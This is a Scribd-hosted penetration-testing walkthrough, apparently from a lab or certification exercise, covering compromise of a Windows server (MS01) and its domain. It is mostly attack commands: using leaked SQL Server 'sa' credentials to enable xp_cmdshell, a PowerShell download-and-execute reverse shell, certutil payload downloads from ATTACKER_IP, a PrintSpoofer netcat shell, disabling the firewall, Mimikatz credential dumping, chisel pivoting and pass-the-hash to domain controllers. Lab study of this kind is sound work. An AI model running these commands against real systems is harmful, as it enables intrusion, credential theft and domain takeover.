Scribd
Upload
167 views8 pages

192.168.xx.101 (MS01) : Port 80 /robots

The document details a penetration testing process on a server (MS01) with various open ports and services, including Microsoft IIS and SQL Server. It outlines initial access through a phpinfo.php file, obtaining database credentials, and executing commands for privilege escalation using tools like Mimikatz and Netcat. The process culminates in gaining administrator access and performing lateral movement to other domain controllers using pass-the-hash techniques.

Uploaded by

laenapanga
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
167 views8 pages

192.168.xx.101 (MS01) : Port 80 /robots

The document details a penetration testing process on a server (MS01) with various open ports and services, including Microsoft IIS and SQL Server. It outlines initial access through a phpinfo.php file, obtaining database credentials, and executing commands for privilege escalation using tools like Mimikatz and Netcat. The process culminates in gaining administrator access and performing lateral movement to other domain controllers using pass-the-hash techniques.

Uploaded by

laenapanga
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

MS01 V2

192.168.xx.101 (MS01)

80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-generator: Nicepage 4.10.5, nicepage.com
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_phpinfo.php
|_http-title: Home
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

1434/udp open ms-sql-m Microsoft SQL Server 15.0.2000.5 (ServerName: MS01; TCPPort: 1433)

INITIAL ACCESS

Port 80

/robots.txt

I got phpinfo.php

MS01 V2 1
http://192.168.xx.101/phpinfo.php

Found DB Credentials

MS01 V2 2
Credentials: sa:D@t@b@535

We can login in the MSSQL Server

https://raw.githubusercontent.com/Alamot/code-snippets/master/mssql/mssql_shell.py

or

mssqlclient.py MS01/[email protected]

xp_cmdshell isn’t enabled

So we’ll run

enable_xp_cmdshell

MS01 V2 3
Now we can execute commands

Get a rev shell with a reverse shell powershell payload like nishang

We raise a http server and Run a listerner

rlwrap -cAr nc -lvp 445

We run this command to get a reverse shell

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("attackerhttpserver/rev.ps1") | powershell -noprofile'

PRIV ESC

MS01 V2 4
We move to a folder where we have write permissions

cd c:\users\public

Uploading printspoofer

certutil.exe -f -urlcache -split http://ATTACKER_IP/PrintSpoofer.exe PrintSpoofer.exe

Uploading Netcat

certutil.exe -f -urlcache -split http://ATTACKER_IP/nc.exe nc.exe

Run a listener with netcat

Run:

MS01 V2 5
.\PrintSpoofer.exe -i -c "nc.exe ATTACKER_IP 443 -e cmd.exe"

GOT SYSTEM

GET PROOF

Disabling AV

netsh firewall set opmode mode=disable profile=all

Post Explotation

Uploading mimikatz

certutil.exe -f -urlcache -split http://ATTACKER_IP/mimi64.exe mimi64.exe

Run Mimikatz to dump stored credentials

.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Domain users

Domain user dumped from mimikatz

MS01 V2 6
tom.green
HASH_NTML

192.16.XX.102 (MS02)
We have a domain user and his NTLM hash, so we’ll do a pass the hash attack

Pivoting + PTH

We upload chisel to the target machine

certutil.exe -f -urlcache -split http://ATTACKER_IP/chisel_windows_1_7_7.exe chisel_windows_1_7_7.exe

.\chisel_windows_1_7_7.exe client ATTACKER_IP:9001 R:8001:socks

./chisel_linux_1.7.7 server -p 9001 --reverse --socks5

Edit proxychains conf

proxychains4 evil-winrm -i localhost -u "tom.green" -H "HASH"

1. After success get shell upload mimikatz again to get user Administrator

2. Found user administrator and NTLM hash, repeat again using evil-winrm

MS01 V2 7
3. Now get access as administrator

192.168.xx.100 (DC01)

1. run net group "Domain Admins" to get get the hash of user nicola pitch (user domain admin)

2. find user at result of mimikatz before and get NTLM hash or password

1. repeat using evil-winrm to ip dc02 to lateral movement to another DC as new user

2. again upload mimikatz and run it to get user Administrator and NTLM Hash

3. get shell again useing evil-winrm as Administrator

MS01 V2 8

You might also like